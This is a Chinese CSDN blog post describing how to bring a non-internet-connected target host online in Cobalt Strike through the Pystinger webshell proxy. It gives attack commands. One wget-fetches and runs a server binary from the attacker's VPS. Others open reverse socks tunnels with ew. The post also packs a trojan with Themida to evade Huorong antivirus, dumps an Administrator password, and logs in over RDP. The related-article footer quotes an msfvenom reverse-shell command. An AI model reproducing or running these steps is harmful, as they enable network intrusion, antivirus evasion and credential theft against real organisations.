Pystinger上线不出网机器

最新推荐文章于 2023-04-25 12:20:43 发布
最新推荐文章于 2023-04-25 12:20:43 发布
阅读量458 收藏
点赞数
分类专栏: 工具 安全基础 文章标签: Pystinger 毒刺 Cobalt Strike 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/120863865
版权

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

01 使用场景

毒刺(Pystinger)通过webshell搭建内网socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不出网但存在web应用可被互联网访问的情况

02 拓扑结构

图片

03  使用方法

下载地址:

https://github.com/FunnyWolf/pystinger

图片

  1. 拿下第一层网络后,上传webshell到机器上。

图片

访问

http://靶机VPS:7777/proxy.php

此时页面出现UTF-8即为成功。

图片

  1. stinger_server上传到目标服务器并开启服务端等待客户端连接

图片

可能是因为文件太大,压缩之后还是没法传

这里使用命令行远程Wget来下载到目标服务器上。

在自己的VPS上搭建一个server  

 python3 -m http.server 1234

图片

在目标服务器上使用wget来下载  

wget http://自己的VPS:1234/stinger_server

图片

然后执行

 chmod 700 stinger_server
    
 ./stinger_server 0.0.0.0

图片

在自己的VPS服务器上执行

./stinger_client -w http://自己的VPS:7777/proxy.php -l 127.0.0.1 -p 60000

图片

此时目标机的60020端口已经映射到了VPS的60020端口了。

在VPS上启动CS的服务端,然后设置监听,其中HTTP Hosts为目标机的ip地址,端口默认60020

目标机网络:

192.168.99.110

10.0.1.135

图片

这里是目标机的内网IP地址

图片

生成木马

图片

保存等待上传到内网机

04  代理到内网机

先在目标机执行ew

./ew_for_linux64  -s rssocks -d 自己的VPS -e 4399

图片

然后在VPS上执行ew

./ew_for_linux64 -s rcsocks -l 1080 -e 4399

图片

设置代理之后即可访问内网

图片

图片

拿下webshell权限之后,使用蚁剑连接,准备传exe

配置蚁剑代理,重启

图片

图片

05  免杀火绒登陆3389

然后上传exe上去,但是由于内网机有火绒,所以在这里需要免杀处理。

使用Themida加壳免杀。

图片

上传至内网机。

图片

然后运行程序,上线成功

图片

抓密码:

图片

用户名:Administrator

密码:!QW@34567

检测3389是否开启

图片

端口是3389,设置代理直接登陆。

使用Proxifiler

图片

登陆成功。

图片

06 小插曲

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息! 

 

 

乌鸦安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
隧道代理技术(二十)之 CS使用HTTP代理上线机器
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-02 835
如图A区域存在一台中转机器,这台机器可以,这种是最常见的情况。我们在渗透测试的过程中经常是拿下一台边缘机器,其有多块卡,边缘机器可以访问内机器,内机器都不
一款使用webshell进行流量转发的工具(pystinger)
lza20001103的博客
08-26 315
一款使用webshell进行流量转发的工具(pystinger) 下载地址:https://github.com/FunnyWolf/pystinger
(毒刺)利用Pystinger Socks4上线主机
mingyqf的博客
07-01 1048
原文链接:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线主机的姿势,包括单主机和内多台主机的两种常见场景!!!项目地址:https://github.com/FunnyWolf/pystinger**相关阅读:**1、利用MSF上线主机的思路分享2、利用goproxy http上线主机0x01 测试环境 0x02 Pystinger简单介绍Pystinger由服
渗透中目标不的情况下使用pystinger进行上线Cobalt Strike
qq_43776040的博客
02-17 3206
渗透中目标不的情况下使用pystinger进行上线cobaltstrike简介上传服务端与代理文件 简介 By:猪儿虫 Github:https://github.com/black537 在内渗透中我们常常遇到内的情况。今天推荐一款工具pystinger。这款工具是一个使用webshell进行流量转发的工具。它使用的是sock4代理,端口映射。可直接进行上线metasploit-framework、viper、cobalt strike。目前只支持PHP、jsp(x)、aspx三种
【工具使用】Pystinger(毒刺)的使用
做自己喜欢的事,并将其发挥到极致!
03-09 1387
文章目录Pystinger介绍项目地址Pystinger 原理图实现主机上线CS服务端配置客户端配置 Pystinger介绍 一款用于Webshell实现内 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。 项目地址 https://github.com/FunnyWolf/pystinger https://gitee.com/zhanghk66
pystinger (毒刺)正向代理工具
weixin_66717977的博客
03-21 1559
pystinger毒刺是一款正向代理工具,通过webshell可以实现内 socks4代理和端口映射,并且也可以直接上线MSF和CS。
渗透工具pystinger:一款使用 webshell 进行流量转发的工具
学习、分享、交流
05-09 1876
通过webshell实现内SOCK4代理,端口映射. 可直接用于metasploit-framework,viper,cobalt strike上线. 主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
pystinger实现不情况下,上线CS的方式
szgyunyun的博客
04-25 386
获取到webshell,目标服务器不。目标机:内地址,端口映射到公ip。s生成后门在目标机运行。
Pystinger的使用
谢公子的博客
08-30 2653
目录 Pystinger 实现多主机上线cs 目标主机执行 VPS执行 CS开启监听 生成木马 内横向移动 Pystinger 一款利用webshell实现内socks4代理、端口映射的工具,可直接用于MSF/CS等上线。使用python编写, 当前支持php,jsp(x),aspx三种代理脚本 。 项目地址: https://github.com/FunnyWolf/pystinger 原地介绍: https://mp.weixin.qq.com/s/45AKbRS677fxyn
Metasploit和Cobaltstrike上线机器
qq_40863723的博客
02-14 3975
多喝热水:http://hackergu.com 内中的很多机器是不可以的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=7777 -f elf >test.elf 在目标机器上使...
ShowDoc突破边界上线Linux不主机
afei001
08-10 383
通过前期的信息收集发现目标子目录使用了ShowDoc组件。ShowDoc一个开源的、适合IT团队的在线API文档、技术文档工具。Showdoc是存在不少漏洞的,通过探测发现后台存在文件上传漏洞。二话不说,掏POC,上传冰蝎免杀webshell上线。...
Pystinger实现内主机CS上线
痴人说梦梦中人
03-29 4686
Pystinger实现内主机CS上线一、Pystinger简介二、原理分析三、操作演示 一、Pystinger简介         毒刺(pystinger)通过webshell实现内SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。 repo:https://github.c
python 服务器与主机简单通信
m18096602934的博客
12-16 405
这里写自定义目录标题主机客户端通信socket使用介绍发送端接收端 主机客户端通信socket 这是项目临时要求用笔记本展示结果,用python写了一个文件传输子程序,在这里保存一下,备用。 使用介绍 在使用这套程序之前需要准备以下工具: 多台电脑,一台发送端,n台接收端,可以运行python3的; 路由器一个(交换机不知道行不行,主要目的是把电脑加到局域里); 无线卡或者线,连接路由器或...
【内渗透】利用非常规手段突破安全策略上线CS
HBohan的博客
10-28 1167
前言 本文为一篇利用非常规手段突破安全策略的内渗透记录 【查看资料】 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 2016,目标不! 装有杀毒软件(火绒、微软自带的WD),ASMI默认开启,而且对power shell有特殊策略限制。 Tcp、icmp、DNS协议不通,无法直接与公的cs服务端建立连接,(内的cs服务端也无法与其建立连接)公也无法访问目标web服务(纯内web服务) 极其严格的入站策略 入
JAVA反序列化系列漏洞复现
谢公子的博客
05-31 7241
目录 Weblogic反序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) Weblogic反序列化漏洞(CVE-2019-2725) JBOSS反序列化漏洞 JBoss JMXInvo...
主机的几种上线方式
mingyqf的博客
03-10 1292
原文链接:https://www.anquanke.com/post/id/254671#h2-7 不主机的几种上线方式 作者:SD 分享到: 发布时间:2021-11-02 10:30:15 前言 拿到一台边缘机器后,内机器很有可能大多数都不,这时又想上线cs方便后续操作。本文就如何上线主机的方式进行了总结。 环境搭建 目标内机器 os:win server 2012 ip:192.168.57.137 边缘机器 os:win server 2012 ip1:19
msf 代理内机器后,进行内其他机器的渗透
weixin_40709439的博客
12-29 2886
##titile :msf 代理内机器后,进行内其他机器的渗透 首先利用反弹木马返回meterpreter shell 利用这个shell 查该机器段,及添加路由,为渗透其他的机器做准备 run get_local_subnets //获取路由地址 run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由 run autoroute -p //查看添加...
各大厂商护面试题汇总
最新发布
06-26
7. **正向shell的其他方法**:除了使用reg键值,还可以通过Webshell建立内SOCKS4代理,实现端口映射,使目标主机在不的情况下与攻击者控制台(CS)建立连接。pystinger是一个例子,可以用于此类操作。 8. **...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值